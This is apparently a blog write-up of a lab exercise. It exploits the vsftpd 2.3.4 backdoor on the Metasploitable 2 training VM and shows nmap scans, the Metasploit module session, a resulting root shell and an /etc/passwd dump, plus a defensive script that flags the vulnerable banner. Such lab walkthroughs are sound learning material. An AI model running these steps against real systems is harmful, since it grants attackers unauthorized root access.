Metasploitable 2 FTP Exploitation (vsftpd backdoor) SESSION 1

Metasploitable 2 has been out for a while, but I hadn't had a chance to use it. So I tried it today and thought I'd write up what I'm trying on Metasploitable here on the blog.

So I started with a simple nmap ping scan of the internal network to see which hosts are up at the moment.


Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-04 08:47 EST
Nmap scan report for 192.168.1.1
Host is up (0.00093s latency).
MAC Address: D8:6H:4C:EA:BB:B1 (Tp-link Technologies Co.)
Nmap scan report for 192.168.1.100
Host is up.
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
MAC Address: 00:64:BE:8M:YD:12 (Sony)
Nmap scan report for 192.168.1.102
Host is up (0.0010s latency).
MAC Address: 08:00:27:A2:76:F2 (Cadmus Computer Systems)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.48 seconds


I know 192.168.1.102 is the Metasploitable virtual machine, so my next step is an ACK scan to check whether any firewall is in the way.

root@bt:~# nmap -sA 192.168.1.102

Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-04 08:48 EST
Nmap scan report for 192.168.1.102
Host is up (0.00057s latency).
All 1000 scanned ports on 192.168.1.102 are unfiltered
MAC Address: 08:00:27:A2:76:F2 (Cadmus Computer Systems)

Since it reports all ports as unfiltered, I guess no firewall is enabled on the system. Let's run an nmap scan to get the open ports and the services running on the target.


root@bt:~# nmap -v -A 192.168.1.102

....
Not shown: 977 closed ports
PORT     STATE SERVICE              VERSION
21/tcp   open  ftp                  vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet               Linux telnetd
....

Now it's a huge list to work through, but here I'm just focusing on what I'm exploiting, so I'll start with FTP, the first of the open ports. It's running a "vsftpd 2.3.4" server. After googling the version and the FTP server, I found the backdoor exploit for vsftpd here: Backdoor VSFTPD
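As an added example (not code from the original post), here is a small Python triage script that parses the nmap port table quoted above and flags what a defender would act on first: the backdoored vsftpd 2.3.4 build, anonymous FTP login, and cleartext telnet. The sample input is constructed from the scan lines shown on this page.

```python
import re

# Constructed sample: the port/version lines from the nmap -v -A output in this post
SAMPLE_NMAP = """\
PORT     STATE SERVICE              VERSION
21/tcp   open  ftp                  vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet               Linux telnetd
"""

# "21/tcp   open  ftp   vsftpd 2.3.4" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# "|_ftp-anon: ..." / "| ssh-hostkey: ..." -> NSE script name and its first output line
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")

def parse_nmap(text):
    """Turn nmap's normal-output port table into a list of dicts."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "scripts": {}})
            continue
        m = SCRIPT_RE.match(line)
        if m and ports:  # script output belongs to the most recent port entry
            ports[-1]["scripts"][m.group(1)] = m.group(2)
    return ports

def triage(ports):
    """Flag what a defender should act on first; returns (port, severity, note) tuples."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        if p["service"] == "ftp" and "vsftpd 2.3.4" in p["version"]:
            findings.append((p["port"], "critical",
                             "vsftpd 2.3.4 banner: the backdoored release, rebuild or upgrade"))
        if "login allowed" in p["scripts"].get("ftp-anon", ""):
            findings.append((p["port"], "high", "anonymous FTP login enabled"))
        if p["service"] == "telnet":
            findings.append((p["port"], "medium", "cleartext telnet exposed, replace with SSH"))
    return findings

if __name__ == "__main__":
    for port, sev, note in triage(parse_nmap(SAMPLE_NMAP)):
        print(f"{port}/tcp  {sev:8s} {note}")
```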

Ok, now it's time to do some Metasploit work.



msf > search vsftpd
[-] Warning: database not connected or cache not built, falling back to slow search

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.102
RHOST => 192.168.1.102
msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.102    yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.100:60641 -> 192.168.1.102:6200) at 2013-03-04 08:58:29 -0500


whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false

exit

So I started the Metasploit Framework, searched for the vsftpd exploit, set RHOST and ran the exploit. And that was it: I was blessed with a reverse shell instantly.

I know there's not much to learn here, just basic vuln identification and an exploit, but it's a start. So, till the next blog post, adios amigos.

Resource Links

Metasploitable Info
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
Download Metasploitable
http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web
Attacker OS: BackTrack
http://www.backtrack-linux.org/downloads/
VSFTPD v2.3.4 Backdoor Command Execution
http://www.metasploit.com/modules/exploit/unix/ftp/vsftpd_234_backdoor
